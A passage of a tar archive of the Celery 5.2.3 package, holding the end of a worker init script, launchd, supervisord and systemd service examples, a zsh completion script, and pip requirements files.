CELERY_CREATE_RUNDIR=1 fi if [ -z "$CELERYD_LOG_FILE" ]; then CELERYD_LOG_FILE="$DEFAULT_LOG_FILE" CELERY_CREATE_LOGDIR=1 fi CELERYD_LOG_LEVEL=${CELERYD_LOG_LEVEL:-${CELERYD_LOGLEVEL:-$DEFAULT_LOG_LEVEL}} CELERY_BIN=${CELERY_BIN:-"celery"} CELERYD_MULTI=${CELERYD_MULTI:-"$CELERY_BIN multi"} CELERYD_NODES=${CELERYD_NODES:-$DEFAULT_NODES} export CELERY_LOADER if [ -n "$2" ]; then CELERYD_OPTS="$CELERYD_OPTS $2" fi CELERYD_LOG_DIR=`dirname $CELERYD_LOG_FILE` CELERYD_PID_DIR=`dirname $CELERYD_PID_FILE` # Extra start-stop-daemon options, like user/group. if [ -n "$CELERYD_CHDIR" ]; then DAEMON_OPTS="$DAEMON_OPTS --workdir=$CELERYD_CHDIR" fi check_dev_null() { if [ ! -c /dev/null ]; then echo "/dev/null is not a character device!" exit 75 # EX_TEMPFAIL fi } maybe_die() { if [ $? -ne 0 ]; then echo "Exiting: $* (errno $?)" exit 77 # EX_NOPERM fi } create_default_dir() { if [ ! -d "$1" ]; then echo "- Creating default directory: '$1'" mkdir -p "$1" maybe_die "Couldn't create directory $1" echo "- Changing permissions of '$1' to 02755" chmod 02755 "$1" maybe_die "Couldn't change permissions for $1" if [ -n "$CELERYD_USER" ]; then echo "- Changing owner of '$1' to '$CELERYD_USER'" chown "$CELERYD_USER" "$1" maybe_die "Couldn't change owner of $1" fi if [ -n "$CELERYD_GROUP" ]; then echo "- Changing group of '$1' to '$CELERYD_GROUP'" chgrp "$CELERYD_GROUP" "$1" maybe_die "Couldn't change group of $1" fi fi } check_paths() { if [ $CELERY_CREATE_LOGDIR -eq 1 ]; then create_default_dir "$CELERYD_LOG_DIR" fi if [ $CELERY_CREATE_RUNDIR -eq 1 ]; then create_default_dir "$CELERYD_PID_DIR" fi } create_paths() { create_default_dir "$CELERYD_LOG_DIR" create_default_dir "$CELERYD_PID_DIR" } export PATH="${PATH:+$PATH:}/usr/sbin:/sbin" _get_pidfiles () { # note: multi < 3.1.14 output to stderr, not stdout, hence the redirect. ${CELERYD_MULTI} expand "${CELERYD_PID_FILE}" ${CELERYD_NODES} 2>&1 } _get_pids() { found_pids=0 my_exitcode=0 for pidfile in $(_get_pidfiles); do local pid=`cat "$pidfile"` local cleaned_pid=`echo "$pid" | sed -e 's/[^0-9]//g'` if [ -z "$pid" ] || [ "$cleaned_pid" != "$pid" ]; then echo "bad pid file ($pidfile)" one_failed=true my_exitcode=1 else found_pids=1 echo "$pid" fi if [ $found_pids -eq 0 ]; then echo "${SCRIPT_NAME}: All nodes down" exit $my_exitcode fi done } _chuid () { ${CELERYD_SU} ${CELERYD_SU_ARGS} "$CELERYD_USER" -c "$CELERYD_MULTI $*" } start_workers () { if [ ! -z "$CELERYD_ULIMIT" ]; then ulimit $CELERYD_ULIMIT fi _chuid $* start $CELERYD_NODES $DAEMON_OPTS \ --pidfile="$CELERYD_PID_FILE" \ --logfile="$CELERYD_LOG_FILE" \ --loglevel="$CELERYD_LOG_LEVEL" \ $CELERY_APP_ARG \ $CELERYD_OPTS } dryrun () { (C_FAKEFORK=1 start_workers --verbose) } stop_workers () { _chuid stopwait $CELERYD_NODES $DAEMON_OPTS --pidfile="$CELERYD_PID_FILE" } restart_workers () { _chuid restart $CELERYD_NODES $DAEMON_OPTS \ --pidfile="$CELERYD_PID_FILE" \ --logfile="$CELERYD_LOG_FILE" \ --loglevel="$CELERYD_LOG_LEVEL" \ $CELERY_APP_ARG \ $CELERYD_OPTS } kill_workers() { _chuid kill $CELERYD_NODES $DAEMON_OPTS --pidfile="$CELERYD_PID_FILE" } restart_workers_graceful () { echo "WARNING: Use with caution in production" echo "The workers will attempt to restart, but they may not be able to." local worker_pids= worker_pids=`_get_pids` [ "$one_failed" ] && exit 1 for worker_pid in $worker_pids; do local failed= kill -HUP $worker_pid 2> /dev/null || failed=true if [ "$failed" ]; then echo "${SCRIPT_NAME} worker (pid $worker_pid) could not be restarted" one_failed=true else echo "${SCRIPT_NAME} worker (pid $worker_pid) received SIGHUP" fi done [ "$one_failed" ] && exit 1 || exit 0 } check_status () { my_exitcode=0 found_pids=0 local one_failed= for pidfile in $(_get_pidfiles); do if [ ! -r $pidfile ]; then echo "${SCRIPT_NAME} down: no pidfiles found" one_failed=true break fi local node=`basename "$pidfile" .pid` local pid=`cat "$pidfile"` local cleaned_pid=`echo "$pid" | sed -e 's/[^0-9]//g'` if [ -z "$pid" ] || [ "$cleaned_pid" != "$pid" ]; then echo "bad pid file ($pidfile)" one_failed=true else local failed= kill -0 $pid 2> /dev/null || failed=true if [ "$failed" ]; then echo "${SCRIPT_NAME} (node $node) (pid $pid) is down, but pidfile exists!" one_failed=true else echo "${SCRIPT_NAME} (node $node) (pid $pid) is up..." fi fi done [ "$one_failed" ] && exit 1 || exit 0 } case "$1" in start) check_dev_null check_paths start_workers ;; stop) check_dev_null check_paths stop_workers ;; reload|force-reload) echo "Use restart" ;; status) check_status ;; restart) check_dev_null check_paths restart_workers ;; graceful) check_dev_null restart_workers_graceful ;; kill) check_dev_null kill_workers ;; dryrun) check_dev_null dryrun ;; try-restart) check_dev_null check_paths restart_workers ;; create-paths) check_dev_null create_paths ;; check-paths) check_dev_null check_paths ;; *) echo "Usage: /etc/init.d/${SCRIPT_NAME} {start|stop|restart|graceful|kill|dryrun|create-paths}" exit 64 # EX_USAGE ;; esac exit 0 ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7317555 celery-5.2.3/extra/macOS/0000775000175000017500000000000000000000000015022 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/macOS/org.celeryq.beat.plist0000664000175000017500000000135700000000000021251 0ustar00asifasif00000000000000 Disabled GroupName celery-beat KeepAlive Label org.celeryq.beat Program celery ProgramArguments beat --loglevel=WARNING RunAtLoad Umask 7 UserName nobody WorkingDirectory / ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/macOS/org.celeryq.worker.plist0000664000175000017500000000136500000000000021646 0ustar00asifasif00000000000000 Disabled GroupName celery-worker KeepAlive Label org.celeryq.worker Program celery ProgramArguments worker --loglevel=WARNING RunAtLoad Umask 7 UserName nobody WorkingDirectory / ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7317555 celery-5.2.3/extra/supervisord/0000775000175000017500000000000000000000000016405 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/supervisord/celery.sh0000664000175000017500000000020600000000000020222 0ustar00asifasif00000000000000#!/bin/bash source {{ additional variables }} exec celery --app={{ application_name }}.celery:app worker --loglevel=INFO -n worker.%%h././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/supervisord/celerybeat.conf0000664000175000017500000000127300000000000021376 0ustar00asifasif00000000000000; ================================ ; celery beat supervisor example ; ================================ [program:celerybeat] ; Set full path to celery program if using virtualenv command=celery -A myapp beat --schedule /var/lib/celery/beat.db --loglevel=INFO ; remove the -A myapp argument if you aren't using an app instance directory=/path/to/project user=nobody numprocs=1 stdout_logfile=/var/log/celery/beat.log stderr_logfile=/var/log/celery/beat.log autostart=true autorestart=true startsecs=10 ; Causes supervisor to send the termination signal (SIGTERM) to the whole process group. stopasgroup=true ; if rabbitmq is supervised, set its priority higher ; so it starts first priority=999 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/supervisord/celeryd.conf0000664000175000017500000000166500000000000020713 0ustar00asifasif00000000000000; ================================== ; celery worker supervisor example ; ================================== [program:celery] ; Directory should become before command directory=/path/to/project user=nobody numprocs=1 stdout_logfile=/var/log/celery/worker.log stderr_logfile=/var/log/celery/worker.log autostart=true autorestart=true startsecs=10 ; Set full path to celery program if using virtualenv command=celery -A proj worker --loglevel=INFO ; Alternatively, ;command=celery --app=your_app.celery:app worker --loglevel=INFO -n worker.%%h ; Or run a script ;command=celery.sh ; Need to wait for currently executing tasks to finish at shutdown. ; Increase this if you have very long running tasks. stopwaitsecs = 600 ; Causes supervisor to send the termination signal (SIGTERM) to the whole process group. stopasgroup=true ; Set Celery priority higher than default (999) ; so, if rabbitmq is supervised, it will start first. priority=1000 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/supervisord/supervisord.conf0000664000175000017500000000172500000000000021646 0ustar00asifasif00000000000000[unix_http_server] file=/tmp/supervisor.sock ; path to your socket file [supervisord] logfile=/var/log/supervisord/supervisord.log ; supervisord log file logfile_maxbytes=50MB ; maximum size of logfile before rotation logfile_backups=10 ; number of backed up logfiles loglevel=info ; info, debug, warn, trace pidfile=/var/run/supervisord.pid ; pidfile location nodaemon=false ; run supervisord as a daemon minfds=1024 ; number of startup file descriptors minprocs=200 ; number of process descriptors user=root ; default user childlogdir=/var/log/supervisord/ ; where child log files will live [rpcinterface:supervisor] supervisor.rpcinterface_factory = supervisor.rpcinterface:make_main_rpcinterface [supervisorctl] serverurl=unix:///tmp/supervisor.sock ; use unix:// schem for a unix sockets. [include] # Uncomment this line for celeryd for Python ;files=celeryd.conf ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7357554 celery-5.2.3/extra/systemd/0000775000175000017500000000000000000000000015510 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/systemd/celery.conf0000664000175000017500000000077700000000000017655 0ustar00asifasif00000000000000# See # http://docs.celeryproject.org/en/latest/userguide/daemonizing.html#usage-systemd CELERY_APP="proj" CELERYD_NODES="worker" CELERYD_OPTS="" CELERY_BIN="/usr/bin/celery" CELERYD_PID_FILE="/var/run/celery/%n.pid" CELERYD_LOG_FILE="/var/log/celery/%n%I.log" CELERYD_LOG_LEVEL="INFO" # The below lines should be uncommented if using the celerybeat.service example # unit file, but are unnecessary otherwise # CELERYBEAT_PID_FILE="/var/run/celery/beat.pid" # CELERYBEAT_LOG_FILE="/var/log/celery/beat.log" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/systemd/celery.service0000664000175000017500000000134400000000000020357 0ustar00asifasif00000000000000[Unit] Description=Celery Service After=network.target [Service] Type=forking User=celery Group=celery EnvironmentFile=-/etc/conf.d/celery WorkingDirectory=/opt/celery ExecStart=/bin/sh -c '${CELERY_BIN} -A $CELERY_APP multi start $CELERYD_NODES \ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \ --loglevel="${CELERYD_LOG_LEVEL}" $CELERYD_OPTS' ExecStop=/bin/sh -c '${CELERY_BIN} multi stopwait $CELERYD_NODES \ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE}' ExecReload=/bin/sh -c '${CELERY_BIN} -A $CELERY_APP multi restart $CELERYD_NODES \ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \ --loglevel="${CELERYD_LOG_LEVEL}" $CELERYD_OPTS' Restart=always [Install] WantedBy=multi-user.target ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/systemd/celery.tmpfiles0000664000175000017500000000011600000000000020536 0ustar00asifasif00000000000000d /var/run/celery 0755 celery celery - d /var/log/celery 0755 celery celery - ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/systemd/celerybeat.service0000664000175000017500000000061300000000000021211 0ustar00asifasif00000000000000[Unit] Description=Celery Beat Service After=network.target [Service] Type=simple User=celery Group=celery EnvironmentFile=/etc/conf.d/celery WorkingDirectory=/opt/celery ExecStart=/bin/sh -c '${CELERY_BIN} -A ${CELERY_APP} beat \ --pidfile=${CELERYBEAT_PID_FILE} \ --logfile=${CELERYBEAT_LOG_FILE} --loglevel=${CELERYD_LOG_LEVEL}' Restart=always [Install] WantedBy=multi-user.target ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7357554 celery-5.2.3/extra/zsh-completion/0000775000175000017500000000000000000000000016773 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/extra/zsh-completion/celery.zsh0000664000175000017500000001414400000000000021010 0ustar00asifasif00000000000000# This is a zsh completion script for Celery # It has to be installed as follows: # # Alternative A) Copy the script to your zsh site-functions directory (often # ``/usr/share/zsh/site-functions``) and name the script ``_celery`` # # Alternative B). Or, use this file as a oh-my-zsh plugin (rename the script # to ``_celery``), and add it to .zshrc: plugins=(celery git osx ruby) # _celery () { local -a _1st_arguments ifargs dopts controlargs typeset -A opt_args _1st_arguments=('worker' 'events' 'beat' 'shell' 'multi' 'amqp' 'status' 'inspect' \ 'control' 'purge' 'list' 'migrate' 'call' 'result' 'report' \ 'graph', 'logtool', 'help') ifargs=('--app=' '--broker=' '--loader=' '--config=' '--version') dopts=('--detach' '--umask=' '--gid=' '--uid=' '--pidfile=' '--logfile=' '--loglevel=') controlargs=('--timeout' '--destination') _arguments \ '(-A --app=)'{-A,--app}'[app instance to use (e.g., module.attr_name):APP]' \ '(-b --broker=)'{-b,--broker}'[url to broker. default is "amqp://guest@localhost//":BROKER]' \ '(--loader)--loader[name of custom loader class to use.:LOADER]' \ '(--config)--config[Name of the configuration module:CONFIG]' \ '(--workdir)--workdir[Optional directory to change to after detaching.:WORKING_DIRECTORY]' \ '(-q --quiet)'{-q,--quiet}'[Don"t show as much output.]' \ '(-C --no-color)'{-C,--no-color}'[Don"t display colors.]' \ '(--version)--version[show program"s version number and exit]' \ '(- : *)'{-h,--help}'[show this help message and exit]' \ '*:: :->subcmds' && return 0 if (( CURRENT == 1 )); then _describe -t commands "celery sub-command" _1st_arguments return fi case "$words[1]" in worker) _arguments \ '(-C --concurrency=)'{-C,--concurrency=}'[Number of child processes processing the queue. The default is the number of CPUs.]' \ '(--pool)--pool=:::(prefork eventlet gevent solo)' \ '(--purge --discard)'{--discard,--purge}'[Purges all waiting tasks before the daemon is started.]' \ '(-f --logfile=)'{-f,--logfile=}'[Path to log file. If no logfile is specified, stderr is used.]' \ '(--loglevel=)--loglevel=:::(critical error warning info debug)' \ '(-N --hostname=)'{-N,--hostname=}'[Set custom hostname, e.g., "foo@example.com".]' \ '(-B --beat)'{-B,--beat}'[Also run the celerybeat periodic task scheduler.]' \ '(-s --schedule=)'{-s,--schedule=}'[Path to the schedule database if running with the -B option. Defaults to celerybeat-schedule.]' \ '(-S --statedb=)'{-S,--statedb=}'[Path to the state database.Default: None]' \ '(-E --events)'{-E,--events}'[Send events that can be captured by monitors like celeryev, celerymon, and others.]' \ '(--time-limit=)--time-limit=[nables a hard time limit (in seconds int/float) for tasks]' \ '(--soft-time-limit=)--soft-time-limit=[Enables a soft time limit (in seconds int/float) for tasks]' \ '(--max-tasks-per-child=)--max-tasks-per-child=[Maximum number of tasks a pool worker can execute before it"s terminated and replaced by a new worker.]' \ '(-Q --queues=)'{-Q,--queues=}'[List of queues to enable for this worker, separated by comma. By default all configured queues are enabled.]' \ '(-I --include=)'{-I,--include=}'[Comma separated list of additional modules to import.]' \ '(--pidfile=)--pidfile=[Optional file used to store the process pid.]' \ '(--autoscale=)--autoscale=[Enable autoscaling by providing max_concurrency, min_concurrency.]' \ compadd -a ifargs ;; inspect) _values -s \ 'active[dump active tasks (being processed)]' \ 'active_queues[dump queues being consumed from]' \ 'ping[ping worker(s)]' \ 'registered[dump of registered tasks]' \ 'report[get bugreport info]' \ 'reserved[dump reserved tasks (waiting to be processed)]' \ 'revoked[dump of revoked task ids]' \ 'scheduled[dump scheduled tasks (eta/countdown/retry)]' \ 'stats[dump worker statistics]' compadd -a controlargs ifargs ;; control) _values -s \ 'add_consumer[tell worker(s) to start consuming a queue]' \ 'autoscale[change autoscale settings]' \ 'cancel_consumer[tell worker(s) to stop consuming a queue]' \ 'disable_events[tell worker(s) to disable events]' \ 'enable_events[tell worker(s) to enable events]' \ 'pool_grow[start more pool processes]' \ 'pool_shrink[use less pool processes]' \ 'rate_limit[tell worker(s) to modify the rate limit for a task type]' \ 'time_limit[tell worker(s) to modify the time limit for a task type.]' compadd -a controlargs ifargs ;; multi) _values -s \ '--nosplash[Don"t display program info.]' \ '--verbose[Show more output.]' \ '--no-color[Don"t display colors.]' \ '--quiet[Don"t show as much output.]' \ 'start' 'restart' 'stopwait' 'stop' 'show' \ 'names' 'expand' 'get' 'kill' compadd -a ifargs ;; amqp) _values -s \ 'queue.declare' 'queue.purge' 'exchange.delete' 'basic.publish' \ 'exchange.declare' 'queue.delete' 'queue.bind' 'basic.get' ;; list) _values -s, 'bindings' ;; shell) _values -s \ '--ipython[force iPython.]' \ '--bpython[force bpython.]' \ '--python[force default Python shell.]' \ '--without-tasks[don"t add tasks to locals.]' \ '--eventlet[use eventlet.]' \ '--gevent[use gevent.]' compadd -a ifargs ;; beat) _arguments \ '(-s --schedule=)'{-s,--schedule=}'[Path to the schedule database. Defaults to celerybeat-schedule.]' \ '(-S --scheduler=)'{-S,--scheduler=}'[Scheduler class to use. Default is celery.beat.PersistentScheduler.]' \ '(--max-interval)--max-interval[]' compadd -a dopts fargs ;; events) _arguments \ '(-d --dump)'{-d,--dump}'[Dump events to stdout.]' \ '(-c --camera=)'{-c,--camera=}'[Take snapshots of events using this camera.]' \ '(-F --frequency=)'{-F,--frequency=}'[Camera: Shutter frequency. Default is every 1.0 seconds.]' \ '(-r --maxrate=)'{-r,--maxrate=}'[Camera: Optional shutter rate limit (e.g., 10/m).]' compadd -a dopts fargs ;; *) ;; esac } ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/pyproject.toml0000664000175000017500000000033400000000000015611 0ustar00asifasif00000000000000[tool.pytest.ini_options] addopts = "--strict-markers" testpaths = "t/unit/" python_classes = "test_*" xdfail_strict=true markers = ["sleepdeprived_patched_module", "masked_modules", "patched_environ", "patched_module"] ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7397556 celery-5.2.3/requirements/0000775000175000017500000000000000000000000015420 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/README.rst0000664000175000017500000000265600000000000017120 0ustar00asifasif00000000000000======================== pip requirements files ======================== Index ===== * :file:`requirements/default.txt` Default requirements for Python 2.7+. * :file:`requirements/jython.txt` Extra requirements needed to run on Jython 2.5 * :file:`requirements/security.txt` Extra requirements needed to use the message signing serializer, see the Security Guide. * :file:`requirements/test.txt` Requirements needed to run the full unittest suite. * :file:`requirements/test-ci-base.txt` Extra test requirements required by the CI suite (Tox). * :file:`requirements/test-ci-default.txt` Extra test requirements required for Python 2.7 by the CI suite (Tox). * :file:`requirements/test-integration.txt` Extra requirements needed when running the integration test suite. * :file:`requirements/doc.txt` Extra requirements required to build the Sphinx documentation. * :file:`requirements/pkgutils.txt` Extra requirements required to perform package distribution maintenance. * :file:`requirements/dev.txt` Requirement file installing the current dev branch of Celery and dependencies (will not be present in stable branches). Examples ======== Installing requirements ----------------------- :: $ pip install -U -r requirements/default.txt Running the tests ----------------- :: $ pip install -U -r requirements/default.txt $ pip install -U -r requirements/test.txt ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755410.0 celery-5.2.3/requirements/default.txt0000664000175000017500000000026300000000000017606 0ustar00asifasif00000000000000pytz>=2021.3 billiard>=3.6.4.0,<4.0 kombu>=5.2.3,<6.0 vine>=5.0.0,<6.0 click>=8.0.3,<9.0 click-didyoumean>=0.0.3 click-repl>=0.2.0 click-plugins>=1.1.1 setuptools>=59.1.1,<59.7.0 ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7397556 celery-5.2.3/requirements/deps/0000775000175000017500000000000000000000000016353 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/deps/mock.txt0000664000175000017500000000001200000000000020036 0ustar00asifasif00000000000000mock>=1.3 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/dev.txt0000664000175000017500000000022100000000000016732 0ustar00asifasif00000000000000pytz>dev git+https://github.com/celery/py-amqp.git git+https://github.com/celery/kombu.git git+https://github.com/celery/billiard.git vine>=5.0.0././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/docs.txt0000664000175000017500000000026400000000000017113 0ustar00asifasif00000000000000sphinx_celery==2.0.0 Sphinx>=3.0.0 sphinx-testing==0.7.2 sphinx-click==2.5.0 -r extras/sqlalchemy.txt -r test.txt -r deps/mock.txt -r extras/auth.txt -r extras/sphinxautobuild.txt ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.7477558 celery-5.2.3/requirements/extras/0000775000175000017500000000000000000000000016726 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/arangodb.txt0000664000175000017500000000001700000000000021242 0ustar00asifasif00000000000000pyArango>=1.3.2././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/auth.txt0000664000175000017500000000001500000000000020424 0ustar00asifasif00000000000000cryptography ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/requirements/extras/azureblockblob.txt0000664000175000017500000000003300000000000022463 0ustar00asifasif00000000000000azure-storage-blob==12.9.0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/brotli.txt0000664000175000017500000000015700000000000020765 0ustar00asifasif00000000000000brotlipy>=0.7.0;platform_python_implementation=="PyPy" brotli>=1.0.0;platform_python_implementation=="CPython" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/cassandra.txt0000664000175000017500000000003000000000000021417 0ustar00asifasif00000000000000cassandra-driver<3.21.0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/consul.txt0000664000175000017500000000001700000000000020770 0ustar00asifasif00000000000000python-consul2 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/cosmosdbsql.txt0000664000175000017500000000002400000000000022014 0ustar00asifasif00000000000000pydocumentdb==2.3.2 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/requirements/extras/couchbase.txt0000664000175000017500000000016700000000000021427 0ustar00asifasif00000000000000couchbase>=3.0.0; platform_python_implementation!='PyPy' and (platform_system != 'Windows' or python_version < '3.10') ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/couchdb.txt0000664000175000017500000000001200000000000021067 0ustar00asifasif00000000000000pycouchdb ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/django.txt0000664000175000017500000000001500000000000020725 0ustar00asifasif00000000000000Django>=1.11 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/dynamodb.txt0000664000175000017500000000001700000000000021262 0ustar00asifasif00000000000000boto3>=1.9.178 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/elasticsearch.txt0000664000175000017500000000001600000000000022276 0ustar00asifasif00000000000000elasticsearch ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/requirements/extras/eventlet.txt0000664000175000017500000000005000000000000021310 0ustar00asifasif00000000000000eventlet>=0.32.0; python_version<"3.10" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/requirements/extras/gevent.txt0000664000175000017500000000001600000000000020754 0ustar00asifasif00000000000000gevent>=1.5.0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/librabbitmq.txt0000664000175000017500000000002300000000000021752 0ustar00asifasif00000000000000librabbitmq>=1.5.0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/memcache.txt0000664000175000017500000000004600000000000021231 0ustar00asifasif00000000000000pylibmc; platform_system != "Windows" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/requirements/extras/mongodb.txt0000664000175000017500000000002500000000000021111 0ustar00asifasif00000000000000pymongo[srv]>=3.11.1 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/msgpack.txt0000664000175000017500000000001000000000000021103 0ustar00asifasif00000000000000msgpack ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/pymemcache.txt0000664000175000017500000000002100000000000021573 0ustar00asifasif00000000000000python-memcached ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/pyro.txt0000664000175000017500000000000600000000000020454 0ustar00asifasif00000000000000pyro4 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/pytest.txt0000664000175000017500000000001600000000000021014 0ustar00asifasif00000000000000pytest-celery ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/requirements/extras/redis.txt0000664000175000017500000000003500000000000020573 0ustar00asifasif00000000000000redis>=3.4.1,!=4.0.0,!=4.0.1 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/s3.txt0000664000175000017500000000001700000000000020012 0ustar00asifasif00000000000000boto3>=1.9.125 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/slmq.txt0000664000175000017500000000003300000000000020437 0ustar00asifasif00000000000000softlayer_messaging>=1.0.3 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/solar.txt0000664000175000017500000000005600000000000020610 0ustar00asifasif00000000000000ephem; platform_python_implementation!="PyPy" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/sphinxautobuild.txt0000664000175000017500000000003300000000000022705 0ustar00asifasif00000000000000sphinx-autobuild>=2021.3.14././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/sqlalchemy.txt0000664000175000017500000000001300000000000021623 0ustar00asifasif00000000000000sqlalchemy ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1636628346.0 celery-5.2.3/requirements/extras/sqs.txt0000664000175000017500000000001300000000000020267 0ustar00asifasif00000000000000kombu[sqs] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/tblib.txt0000664000175000017500000000011100000000000020554 0ustar00asifasif00000000000000tblib>=1.5.0;python_version>='3.8.0' tblib>=1.3.0;python_version<'3.8.0' ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/thread.txt0000664000175000017500000000004700000000000020737 0ustar00asifasif00000000000000futures>=3.1.1; python_version < '3.0' ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/yaml.txt0000664000175000017500000000001500000000000020425 0ustar00asifasif00000000000000PyYAML>=3.10 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/zeromq.txt0000664000175000017500000000001600000000000021001 0ustar00asifasif00000000000000pyzmq>=13.1.0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/zookeeper.txt0000664000175000017500000000001500000000000021466 0ustar00asifasif00000000000000kazoo>=1.3.1 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/requirements/extras/zstd.txt0000664000175000017500000000001200000000000020444 0ustar00asifasif00000000000000zstandard ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/requirements/pkgutils.txt0000664000175000017500000000034200000000000020022 0ustar00asifasif00000000000000setuptools>=40.8.0 